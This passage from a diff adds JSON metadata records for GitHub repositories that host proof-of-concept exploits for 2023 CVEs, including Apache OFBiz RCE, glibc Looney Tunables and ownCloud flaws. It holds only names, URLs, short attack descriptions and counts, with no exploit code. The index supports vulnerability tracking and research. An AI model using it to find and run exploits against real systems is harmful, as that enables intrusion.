"owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.simplemobiletools.dialer", + "description": "CVE-2023-49003", + "fork": false, + "created_at": "2023-11-19T18:08:23Z", + "updated_at": "2024-01-17T19:58:22Z", + "pushed_at": "2023-11-19T18:20:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-49003" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49038.json b/2023/CVE-2023-49038.json new file mode 100644 index 0000000000..4a2074cfb8 --- /dev/null +++ b/2023/CVE-2023-49038.json @@ -0,0 +1,33 @@ +[ + { + "id": 731396286, + "name": "CVE-2023-49038", + "full_name": "christopher-pace\/CVE-2023-49038", + "owner": { + "login": "christopher-pace", + "id": 22531478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22531478?v=4", + "html_url": "https:\/\/github.com\/christopher-pace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/christopher-pace\/CVE-2023-49038", + "description": "Command Injection in Ping Utility on Buffalo LS210D Version 1.78-0.03", + "fork": false, + "created_at": "2023-12-14T01:49:52Z", + "updated_at": "2024-01-07T03:38:02Z", + "pushed_at": "2024-01-07T03:37:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49052.json b/2023/CVE-2023-49052.json new file mode 100644 index 0000000000..841b9c2c55 --- /dev/null +++ b/2023/CVE-2023-49052.json @@ -0,0 +1,33 @@ +[ + { + "id": 724166656, + "name": "CVE-2023-49052", + "full_name": "Cyber-Wo0dy\/CVE-2023-49052", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-49052", + "description": "Microweber version 2.0.4 vulnerable to \"Uploading Malicious Files\" ", + "fork": false, + "created_at": "2023-11-27T14:29:32Z", + "updated_at": "2023-11-27T14:33:10Z", + "pushed_at": "2023-11-27T17:20:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49070.json b/2023/CVE-2023-49070.json new file mode 100644 index 0000000000..465a6aa408 --- /dev/null +++ b/2023/CVE-2023-49070.json @@ -0,0 +1,199 @@ +[ + { + "id": 731528272, + "name": "ofbiz-CVE-2023-49070-RCE-POC", + "full_name": "abdoghazy2015\/ofbiz-CVE-2023-49070-RCE-POC", + "owner": { + "login": "abdoghazy2015", + "id": 64314534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64314534?v=4", + "html_url": "https:\/\/github.com\/abdoghazy2015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abdoghazy2015\/ofbiz-CVE-2023-49070-RCE-POC", + "description": null, + "fork": false, + "created_at": "2023-12-14T09:32:41Z", + "updated_at": "2024-10-03T05:17:52Z", + "pushed_at": "2023-12-15T06:29:09Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 59, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 732816678, + "name": "CVE-2023-49070", + "full_name": "0xrobiul\/CVE-2023-49070", + "owner": { + "login": "0xrobiul", + "id": 100078094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100078094?v=4", + "html_url": "https:\/\/github.com\/0xrobiul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xrobiul\/CVE-2023-49070", + "description": "Exploit Of Pre-auth RCE in Apache Ofbiz!!", + "fork": false, + "created_at": "2023-12-17T22:56:10Z", + "updated_at": "2023-12-18T17:44:46Z", + "pushed_at": "2023-12-26T19:51:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-ofbiz", + "cve", + "cve-2023-49070", + "ofbiz", + "pre-auth", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738951607, + "name": "OFBiz-Attack", + "full_name": "D0g3-8Bit\/OFBiz-Attack", + "owner": { + "login": "D0g3-8Bit", + "id": 150698913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150698913?v=4", + "html_url": "https:\/\/github.com\/D0g3-8Bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D0g3-8Bit\/OFBiz-Attack", + "description": "A Tool For CVE-2023-49070\/CVE-2023-51467 Attack", + "fork": false, + "created_at": "2024-01-04T12:31:49Z", + "updated_at": "2024-10-18T15:39:14Z", + "pushed_at": "2024-03-12T11:06:55Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-ofbiz", + "cve-2023-49070", + "cve-2023-51467" + ], + "visibility": "public", + "forks": 1, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740289485, + "name": "Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz", + "full_name": "UserConnecting\/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz", + "owner": { + "login": "UserConnecting", + "id": 97047842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97047842?v=4", + "html_url": "https:\/\/github.com\/UserConnecting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UserConnecting\/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz", + "description": "Authentication Bypass Vulnerability Apache OFBiz < 18.12.10.", + "fork": false, + "created_at": "2024-01-08T03:13:43Z", + "updated_at": "2024-04-13T04:19:46Z", + "pushed_at": "2024-01-08T07:03:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742169705, + "name": "CVE-2023-49070_CVE-2023-51467", + "full_name": "yukselberkay\/CVE-2023-49070_CVE-2023-51467", + "owner": { + "login": "yukselberkay", + "id": 22750024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22750024?v=4", + "html_url": "https:\/\/github.com\/yukselberkay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yukselberkay\/CVE-2023-49070_CVE-2023-51467", + "description": "CVE-2023-49070 exploit and CVE-2023-49070 & CVE-2023-51467 vulnerability scanner", + "fork": false, + "created_at": "2024-01-11T22:35:57Z", + "updated_at": "2024-04-29T11:54:01Z", + "pushed_at": "2024-01-12T10:37:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744384595, + "name": "Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467", + "full_name": "Praison001\/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467", + "description": "This exploit scans whether the provided target is vulnerable to CVE-2023-49070\/CVE-2023-51467 and also exploits it depending on the choice of the user.", + "fork": false, + "created_at": "2024-01-17T07:31:26Z", + "updated_at": "2024-01-17T07:45:27Z", + "pushed_at": "2024-01-25T08:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49103.json b/2023/CVE-2023-49103.json new file mode 100644 index 0000000000..11800b2ef1 --- /dev/null +++ b/2023/CVE-2023-49103.json @@ -0,0 +1,95 @@ +[ + { + "id": 722207170, + "name": "CVE-2023-49103", + "full_name": "creacitysec\/CVE-2023-49103", + "owner": { + "login": "creacitysec", + "id": 151768625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151768625?v=4", + "html_url": "https:\/\/github.com\/creacitysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/creacitysec\/CVE-2023-49103", + "description": "PoC for the CVE-2023-49103", + "fork": false, + "created_at": "2023-11-22T17:00:23Z", + "updated_at": "2024-10-03T05:17:51Z", + "pushed_at": "2023-12-02T01:09:04Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 733384203, + "name": "OwnCloud-CVE-2023-49103", + "full_name": "merlin-ke\/OwnCloud-CVE-2023-49103", + "owner": { + "login": "merlin-ke", + "id": 55712262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55712262?v=4", + "html_url": "https:\/\/github.com\/merlin-ke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merlin-ke\/OwnCloud-CVE-2023-49103", + "description": "OwnCloud CVE-2023-49103", + "fork": false, + "created_at": "2023-12-19T07:56:18Z", + "updated_at": "2023-12-19T08:10:42Z", + "pushed_at": "2023-12-19T08:10:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 820945344, + "name": "CVE-2023-49103", + "full_name": "d0rb\/CVE-2023-49103", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-49103", + "description": "This is a simple proof of concept for CVE-2023-49103.", + "fork": false, + "created_at": "2024-06-27T13:46:46Z", + "updated_at": "2024-06-27T13:49:50Z", + "pushed_at": "2024-06-27T13:49:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49105.json b/2023/CVE-2023-49105.json new file mode 100644 index 0000000000..52a98f89f2 --- /dev/null +++ b/2023/CVE-2023-49105.json @@ -0,0 +1,33 @@ +[ + { + "id": 727692725, + "name": "owncloud-exploits", + "full_name": "ambionics\/owncloud-exploits", + "owner": { + "login": "ambionics", + "id": 29630660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4", + "html_url": "https:\/\/github.com\/ambionics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ambionics\/owncloud-exploits", + "description": "ownCloud exploits for CVE-2023-49105", + "fork": false, + "created_at": "2023-12-05T11:35:12Z", + "updated_at": "2025-01-01T17:45:00Z", + "pushed_at": "2023-12-05T11:35:19Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4911.json b/2023/CVE-2023-4911.json new file mode 100644 index 0000000000..dfa0c031a3 --- /dev/null +++ b/2023/CVE-2023-4911.json @@ -0,0 +1,502 @@ +[ + { + "id": 700333818, + "name": "CVE-2023-4911", + "full_name": "Green-Avocado\/CVE-2023-4911", + "owner": { + "login": "Green-Avocado", + "id": 58372700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58372700?v=4", + "html_url": "https:\/\/github.com\/Green-Avocado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Green-Avocado\/CVE-2023-4911", + "description": "https:\/\/www.qualys.com\/2023\/10\/03\/cve-2023-4911\/looney-tunables-local-privilege-escalation-glibc-ld-so.txt", + "fork": false, + "created_at": "2023-10-04T11:58:58Z", + "updated_at": "2023-10-10T12:53:31Z", + "pushed_at": "2023-10-05T20:48:46Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 700394746, + "name": "CVE-2023-4911", + "full_name": "leesh3288\/CVE-2023-4911", + "owner": { + "login": "leesh3288", + "id": 17825906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17825906?v=4", + "html_url": "https:\/\/github.com\/leesh3288", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leesh3288\/CVE-2023-4911", + "description": "PoC for CVE-2023-4911", + "fork": false, + "created_at": "2023-10-04T14:12:16Z", + "updated_at": "2025-01-05T09:41:34Z", + "pushed_at": "2023-10-04T14:16:36Z", + "stargazers_count": 382, + "watchers_count": 382, + "has_discussions": false, + "forks_count": 58, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 58, + "watchers": 382, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 700404689, + "name": "CVE-2023-4911", + "full_name": "RickdeJager\/CVE-2023-4911", + "owner": { + "login": "RickdeJager", + "id": 29239050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29239050?v=4", + "html_url": "https:\/\/github.com\/RickdeJager", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RickdeJager\/CVE-2023-4911", + "description": "CVE-2023-4911 proof of concept", + "fork": false, + "created_at": "2023-10-04T14:32:49Z", + "updated_at": "2024-12-31T04:46:52Z", + "pushed_at": "2023-10-08T23:24:24Z", + "stargazers_count": 166, + "watchers_count": 166, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 166, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 701947383, + "name": "CVE-2023-4911", + "full_name": "xiaoQ1z\/CVE-2023-4911", + "owner": { + "login": "xiaoQ1z", + "id": 20059156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20059156?v=4", + "html_url": "https:\/\/github.com\/xiaoQ1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaoQ1z\/CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2023-10-08T03:26:24Z", + "updated_at": "2023-10-08T03:30:00Z", + "pushed_at": "2023-10-08T03:28:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703037275, + "name": "looney-tuneables", + "full_name": "silent6trinity\/looney-tuneables", + "owner": { + "login": "silent6trinity", + "id": 78173918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78173918?v=4", + "html_url": "https:\/\/github.com\/silent6trinity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silent6trinity\/looney-tuneables", + "description": "CVE-2023-4911", + "fork": false, + "created_at": "2023-10-10T13:29:11Z", + "updated_at": "2023-10-10T13:30:33Z", + "pushed_at": "2023-10-10T13:32:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703246649, + "name": "looney-tunables-CVE-2023-4911", + "full_name": "hadrian3689\/looney-tunables-CVE-2023-4911", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/looney-tunables-CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2023-10-10T22:04:23Z", + "updated_at": "2024-12-03T23:08:07Z", + "pushed_at": "2023-10-15T19:37:06Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703602936, + "name": "CVE-2023-4911", + "full_name": "ruycr4ft\/CVE-2023-4911", + "owner": { + "login": "ruycr4ft", + "id": 103446004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103446004?v=4", + "html_url": "https:\/\/github.com\/ruycr4ft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruycr4ft\/CVE-2023-4911", + "description": "CVE-2023-4911", + "fork": false, + "created_at": "2023-10-11T14:49:22Z", + "updated_at": "2024-12-05T05:21:18Z", + "pushed_at": "2023-10-11T15:15:18Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-4911", + "linux-privilege-escalation", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704757696, + "name": "CVE-2023-4911", + "full_name": "guffre\/CVE-2023-4911", + "owner": { + "login": "guffre", + "id": 21281361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21281361?v=4", + "html_url": "https:\/\/github.com\/guffre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guffre\/CVE-2023-4911", + "description": "PoC for CVE-2023-4911 LooneyTuneables", + "fork": false, + "created_at": "2023-10-14T02:24:52Z", + "updated_at": "2023-10-14T02:25:44Z", + "pushed_at": "2023-12-09T22:49:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706044499, + "name": "LooneyPwner", + "full_name": "chaudharyarjun\/LooneyPwner", + "owner": { + "login": "chaudharyarjun", + "id": 66072013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66072013?v=4", + "html_url": "https:\/\/github.com\/chaudharyarjun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chaudharyarjun\/LooneyPwner", + "description": "Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.", + "fork": false, + "created_at": "2023-10-17T07:44:16Z", + "updated_at": "2024-11-02T12:18:42Z", + "pushed_at": "2023-10-18T04:59:50Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 709787729, + "name": "CVE-2023-4911", + "full_name": "KernelKrise\/CVE-2023-4911", + "owner": { + "login": "KernelKrise", + "id": 76210733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76210733?v=4", + "html_url": "https:\/\/github.com\/KernelKrise", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KernelKrise\/CVE-2023-4911", + "description": "Looney Tunables Local privilege escalation (CVE-2023-4911) workshop", + "fork": false, + "created_at": "2023-10-25T11:59:34Z", + "updated_at": "2024-10-28T23:06:00Z", + "pushed_at": "2024-10-01T08:39:14Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711297984, + "name": "CVE-2023-4911", + "full_name": "Diego-AltF4\/CVE-2023-4911", + "owner": { + "login": "Diego-AltF4", + "id": 55554183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55554183?v=4", + "html_url": "https:\/\/github.com\/Diego-AltF4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diego-AltF4\/CVE-2023-4911", + "description": "Proof of concept for CVE-2023-4911 (Looney Tunables) discovered by Qualys Threat Research Unit ", + "fork": false, + "created_at": "2023-10-28T20:05:30Z", + "updated_at": "2024-11-03T18:00:44Z", + "pushed_at": "2024-11-03T18:00:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716007417, + "name": "looneyCVE", + "full_name": "teraGL\/looneyCVE", + "owner": { + "login": "teraGL", + "id": 35891879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35891879?v=4", + "html_url": "https:\/\/github.com\/teraGL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teraGL\/looneyCVE", + "description": "Looney Tunables CVE-2023-4911", + "fork": false, + "created_at": "2023-11-08T09:34:04Z", + "updated_at": "2023-11-13T08:09:54Z", + "pushed_at": "2023-11-13T14:59:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729907332, + "name": "Looney-Tunables", + "full_name": "snurkeburk\/Looney-Tunables", + "owner": { + "login": "snurkeburk", + "id": 70603096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70603096?v=4", + "html_url": "https:\/\/github.com\/snurkeburk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snurkeburk\/Looney-Tunables", + "description": "PoC of CVE-2023-4911", + "fork": false, + "created_at": "2023-12-10T18:05:27Z", + "updated_at": "2023-12-10T18:14:12Z", + "pushed_at": "2023-12-10T19:28:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735025193, + "name": "CVE-2023-4911", + "full_name": "puckiestyle\/CVE-2023-4911", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:54:40Z", + "updated_at": "2023-12-23T11:54:52Z", + "pushed_at": "2023-12-23T11:54:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745620836, + "name": "Looney-Tunables-CVE-2023-4911", + "full_name": "yanfernandess\/Looney-Tunables-CVE-2023-4911", + "owner": { + "login": "yanfernandess", + "id": 100174458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100174458?v=4", + "html_url": "https:\/\/github.com\/yanfernandess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanfernandess\/Looney-Tunables-CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2024-01-19T18:20:05Z", + "updated_at": "2024-01-22T19:50:29Z", + "pushed_at": "2024-01-19T18:44:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745988276, + "name": "CVE-2023-4911-PoC", + "full_name": "NishanthAnand21\/CVE-2023-4911-PoC", + "owner": { + "login": "NishanthAnand21", + "id": 87749392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87749392?v=4", + "html_url": "https:\/\/github.com\/NishanthAnand21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NishanthAnand21\/CVE-2023-4911-PoC", + "description": "Repository containing a Proof of Concept (PoC) demonstrating the impact of CVE-2023-4911, a vulnerability in glibc's ld.so dynamic loader, exposing risks related to Looney Tunables. ", + "fork": false, + "created_at": "2024-01-20T18:47:07Z", + "updated_at": "2024-11-13T07:24:42Z", + "pushed_at": "2024-11-13T07:24:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49313.json b/2023/CVE-2023-49313.json new file mode 100644 index 0000000000..b219f7637f --- /dev/null +++ b/2023/CVE-2023-49313.json @@ -0,0 +1,33 @@ +[ + { + "id": 724369843, + "name": "CVE-2023-49313", + "full_name": "louiselalanne\/CVE-2023-49313", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2023-49313", + "description": "A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.", + "fork": false, + "created_at": "2023-11-27T23:59:35Z", + "updated_at": "2023-12-07T01:21:35Z", + "pushed_at": "2023-11-28T12:59:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49314.json b/2023/CVE-2023-49314.json new file mode 100644 index 0000000000..fce26d558f --- /dev/null +++ b/2023/CVE-2023-49314.json @@ -0,0 +1,33 @@ +[ + { + "id": 724563642, + "name": "CVE-2023-49314", + "full_name": "louiselalanne\/CVE-2023-49314", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2023-49314", + "description": "Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and enableNodeCliInspectArguments, and thus r3ggi\/electroniz3r can be used to perform an attack.", + "fork": false, + "created_at": "2023-11-28T10:39:19Z", + "updated_at": "2024-05-06T04:13:03Z", + "pushed_at": "2023-11-28T11:48:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49339.json b/2023/CVE-2023-49339.json new file mode 100644 index 0000000000..1ab58283d1 --- /dev/null +++ b/2023/CVE-2023-49339.json @@ -0,0 +1,33 @@ +[ + { + "id": 744744997, + "name": "CVE-2023-49339", + "full_name": "3zizme\/CVE-2023-49339", + "owner": { + "login": "3zizme", + "id": 75446753, + "avatar_url": 